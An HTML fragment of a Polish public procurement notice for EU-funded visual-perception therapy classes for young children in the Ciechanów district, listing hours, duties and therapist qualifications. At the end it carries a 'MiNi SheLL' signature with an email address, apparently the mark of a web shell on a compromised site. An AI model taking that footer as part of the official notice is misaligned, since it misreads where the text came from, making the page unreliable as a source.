<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zorganizowanie i prowadzenie zajęć usprawniających percepcję wzrokową dla dzieci z klas O i I szkół podstawowych z terenu powiatu ciechanowskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie przez terapeutę zajęć  usprawniających percepcję wzrokową dla 6 grup dzieci z klas O i  z klas I szkół podstawowych z terenu powiatu ciechanowskiego w ramach projektu Poradnia równych szans współfinansowanego ze środków  Europejskiego Funduszu Społecznego - Program Operacyjny  Kapitał Ludzki Priorytet IX. Rozwój wykształcenia i kompetencji w regionach,  DZIAŁANIE  9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty PODDZIAŁANIE  9.1.2  Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych .


Termin realizacji zajęć - od daty podpisania umowy do 30.06.2012 r.

Ilość godzin:  łącznie 174 godziny, w tym:
- dokonanie diagnozy wstępnej- 12 godzin
- przeprowadzenie zajęć z dziećmi- 150 godzin, w tym 54 godziny do realizacji do 10 grudnia 2011r.
-  Dokonanie diagnozy końcowej- 12 godzin.

Realizacja zajęć na terenie Poradni Psychologiczno- Pedagogicznej w Ciechanowie w terminach ustalonych z rodzicami i uczestnikami zajęć oraz w godzinach, które nie kolidują i nie dezorganizują  pracy Poradni. Zadania mają być realizowane od poniedziałku do piątku  (z wyłączeniem sobót i niedziel)  1-2 razy w tygodniu w godzinach popołudniowych (14.00- 18.00) zgodnie z ustalonym wcześniej harmonogramem.


Do Wykonawcy zamówienia publicznego należy :
1.	Zorganizowanie i przeprowadzenie zajęć dla 12 dzieci z klas O oraz klas I  w grupach 2-osobowych   25  godzin zajęć  (po 1godzinie  z każdą dwuosobową grupą).
2.	Prowadzenie czynności związanych z rekrutacją do projektu poprzez nawiązanie kontaktów ze szkołami, rozmowy osobiste i telefoniczne z rodzicami, zebranie od rodziców Ankiet rekrutacyjnych, niezbędnych oświadczeń oraz umów o udziale w projekcie 
3.	Zebranie od rodziców dzieci objętych zadaniem wszystkich niezbędnych dokumentów, oświadczeń i deklaracji.
4.	Przeprowadzenie diagnozy wstępnej testem psychologicznym FROSTIG  - 1 godzina na każde dziecko
5.	Przeprowadzenie   diagnozy  końcowej testem psychologicznym FROSTIG  - 1 godzina na każde dziecko.
6.	Osiągnięcie wymaganych rezultatów poprzez ukończenie zajęć przez 12 dzieci, w tym 4 dziewczęta.
7.	Osiągnięcie wymaganych rezultatów poprzez zwiększenie sprawności koordynacji wzrokowo- ruchowej oraz orientacji w stosunkach przestrzennych u 70 % objętych zajęciami i udokumentowanie tego faktu.
8.	Bieżące prowadzenie  Dziennika zajęć i  odnotowywanie w Dzienniku informacji dot. postępów dzieci.
9.	Każdorazowe potwierdzanie obecności dziecka na zajęciach podpisem rodzica na liście obecności.
10.	Opracowanie programu pracy z każdą grupą.
11.	Dokonanie analizy porównawczej diagnoz /sprawdzianów początkowych i końcowych/ i przedstawienie ich w formie pisemnej nie później niż 4 dni od zakończeniu zajęć
12.	Współpraca z kadrą projektu
13.	Prowadzenie karty pracy i innych niezbędnych dokumentów związanych z realizacją projektu.
14.	Informowanie o finansowaniu realizacji projektu przez Unię Europejską poprzez zamieszczenie w dokumentacji zespołu informacji o udziale Unii Europejskiej, a także oznakowania miejsca realizacji, zgodnie z wymogami Rozporządzenia Rady (WE) nr 1083/2006 z dnia 11 lipca 2006 r. ustanawiającego przepisy ogólne dotyczące Europejskiego Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego oraz Funduszu Spójności (Dz. Urz. UE L 210/25 z 31.07.2006) oraz rozporządzeniem Komisji WE nr 1828/2006 ustanawiającego szczegółowe zasady wykonania Rozporządzenia Rady WE nr1083/2006 (Dz. Urz. UE L 371/1 z 27.12.2006) i  wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki 2007 - 2013.
15.	Przekazanie Zamawiającemu, w terminie do 5 dni od dnia zakończenia realizacji  zadania pełnej dokumentacji z przeprowadzonych zajęć.
16.	Przechowywanie dokumentów potwierdzających realizację przedmiotowych zajęć. 

Wymagania stawiane przez Zamawiającego  Wykonawcy zamówienia publicznego:
     1.Wykształcenie: wyższe magisterskie na kierunku psychologia 
        z przygotowaniem pedagogicznym.
2.	Minimum 2-letnie doświadczenie w pracy z dziećmi. 
3.	Minimum 2- letnie doświadczenie w dokonywaniu diagnozy dzieci i programowaniu pracy w oparciu o dokonaną diagnozę.
4.	Umiejętność stosowania testu FROSTIG
5.	Znajomość programu Frostig- Horn usprawniającego percepcję wzrokową.
6.	Umiejętność dokonywania ewaluacji prowadzonych zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com